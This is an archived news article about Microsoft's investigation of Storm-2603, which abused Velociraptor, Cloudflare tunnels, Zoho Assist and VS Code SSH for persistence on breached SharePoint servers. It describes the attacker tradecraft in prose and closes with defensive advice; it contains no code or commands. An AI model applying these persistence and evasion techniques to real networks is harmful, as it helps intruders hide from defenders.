CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 23, 2026

Hackers Use Velociraptor, Cloudflare Tunnels, Zoho Assist, and VS Code SSH for Persistence

Cybersecurity News Archived Jun 23, 2026 ✓ Full text saved

A routine ransomware investigation turned into something far more alarming when security researchers uncovered two separate threat actors quietly sharing the same compromised environment. What started as a single intrusion quickly revealed a far more complex operation involving multiple remote access tools, tunneling software, and legitimate administrative utilities weaponized for long-term persistence inside a target […] The post Hackers Use Velociraptor, Cloudflare Tunnels, Zoho Assist, and VS

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeCyber Security News Hackers Use Velociraptor, Cloudflare Tunnels, Zoho Assist, and VS Code SSH for Persistence By Tushar Subhra Dutta June 23, 2026 A routine ransomware investigation turned into something far more alarming when security researchers uncovered two separate threat actors quietly sharing the same compromised environment. What started as a single intrusion quickly revealed a far more complex operation involving multiple remote access tools, tunneling software, and legitimate administrative utilities weaponized for long-term persistence inside a target network. The attack centered on on-premises SharePoint servers, which had been under sustained pressure since mid-2025. The threat actor, tracked as Storm-2603, exploited known vulnerabilities while probing for additional entry points. Requests were made for sensitive files like win.ini and web.config, suggesting reconnaissance for local file inclusion weaknesses, though full exploitation of this specific vector was not confirmed during the investigation. Analysts at Microsoft identified the full scope of this campaign after correlating signals across identities, endpoints, and cloud infrastructure. Their Detection and Response Team, known as DART, uncovered the coordinated use of multiple tools to sustain access, escalate privileges, and stay completely hidden inside the target network for an extended period without raising any alarms. Once inside, the attackers layered their access using a combination of well-known and trusted tools. This approach made their activity much harder to distinguish from routine system administration, buying them critical time to move deeper into the network without triggering immediate alerts or raising suspicion from the security teams monitoring the organization. A second, unrelated threat actor was also found operating within the same environment at the same time. That group relied on malicious DLL sideloading and custom backdoors, techniques entirely distinct from Storm-2603’s methods. The presence of two overlapping attack campaigns significantly complicated attribution and made the full scope of the intrusion far harder to detect or contain. Hackers Use Velociraptor, Cloudflare Tunnels, Zoho Assist, and VS Code SSH Storm-2603 deployed Velociraptor, a legitimate open-source forensic and incident response tool, with SYSTEM-level privileges to map the compromised environment. Since Velociraptor is widely trusted and commonly used by security teams, its presence blended seamlessly with normal administrative behavior, making it an effective cover for malicious activity running in plain sight. To ensure continued remote access, the attackers configured Cloudflare tunnels, which allowed them to route traffic through a trusted third-party service and bypass conventional network monitoring. They also used Zoho Assist and SSH connections established through Visual Studio Code, creating multiple redundant access channels that would persist even if one method was blocked or discovered by defenders inside the organization. Privilege escalation followed shortly after, with new local and domain administrator accounts created to lock in long-term control. A vulnerable driver was also exploited to tamper with system memory and disable security protections, further reducing the attackers’ visibility to defense tools running within the compromised environment at the time. Microsoft said in a report shared with Cyber Security News (CSN) that DART contained the intrusion by activating a structured response playbook, correlating telemetry across all affected systems, and conducting daily briefings with the organization to ensure timely and aligned containment actions throughout the investigation. Strengthening Defenses Against Multi-Actor Intrusions The findings highlight just how far threat actors are willing to go to maintain their foothold inside a network. When two separate groups are working within the same environment simultaneously, signals become mixed, attribution becomes harder, and traditional detection methods begin to fall short of what security teams genuinely need. Microsoft’s response team emphasized that organizations should prioritize patching internet-facing systems to reduce the risk of initial access. Strengthening identity security is equally important, as credential misuse played a central role in enabling threat actor escalation and persistence throughout this investigation. Security teams are also advised to deploy endpoint protection widely, retain telemetry centrally, and keep incident response playbooks tested and ready to activate quickly. Monitoring the use of remote access and tunneling tools is critical, since legitimate software like Velociraptor, VS Code, and Zoho Assist can all be quietly abused by attackers to move undetected across a compromised network. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Hackers Abuse Legitimate RMM Tools to Maintain Persistent Access and Evade Detection FishMonger Hackers Expands SprySOCKS Backdoor From Linux to Windows With Advanced Stealth Features Using Real-Time Network Monitoring to Spot Suspicious Application Behavior on macOS Hackers Abuse Steam Workshop Application Wallpapers to Hijack Active Steam Sessions QNAP Patches Multiple Injection Vulnerabilities Leads to Arbitrary Command Execution Latest News Cyber Security News FBI Warns Cybercriminals Use Traffic Distribution Systems to Redirect Users to Fraudulent Websites Cyber Security News Cordyceps Supply Chain Flaw Impacting Code Repositories at thousands of Organizations Cyber Security News Hackers Abuse Compromised M365 Accounts to Scale CodeStorm Phishing Operations Cyber Security News Scattered Spider Hackers Who Breached London Transport Network Plead Guilty Cyber Security 15 Best Linux Network Monitoring Tools in 2026
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    Jun 23, 2026
    Archived
    Jun 23, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗